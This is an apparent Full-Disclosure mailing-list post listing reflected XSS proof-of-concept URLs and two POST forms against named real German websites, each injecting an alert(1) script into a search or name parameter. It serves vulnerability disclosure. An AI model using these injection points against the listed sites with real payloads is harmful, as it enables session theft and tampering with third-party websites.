Blog-Entry: http://www.hboeck.de/item/468

http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script>
http://www.netbeat.de/support/kommentare.html?name="><script>alert(1)</script>
http://www.symlink.ch/users.pl?unickname="><script>alert(1)</script>
http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script>
http://www.holidayranking.de/search.html?searchSearchString="><script>alert(1)</script>
http://www.freecity.de/suche/index.phtml?gosearch=yes&words="><script>alert(1)</script>
http://search.netdoktor.com/results.html?qt="><script>alert(1)</script>&la=de
http://www.vfb.de/de/suche/index.php?words="><script>alert(1)</script>
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt="><script>alert(1)</script>

And some with post:

<form method="post" action="http://www.adac.de/Search/SearchResult/RW_SearchResult.asp">
  <input type="hidden" name="RWQuery" value='"><script>alert(1)</script>'/>
  <input type="submit" value="adac.de"/>
</form>

<form method="post" action="http://www.tu-berlin.de/www/software/java/cgi-bin/search.pl">
  <input type="hidden" NAME="terms" value='"><script>alert(1)</script>'/>
  <input type="submit" value="hoax-info.de"/>
</form>

-- 
Hanno Böck
Blog: http://www.hboeck.de/
GPG: 3DBD3B20
Jabber: jabber@xxxxxxxxx
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/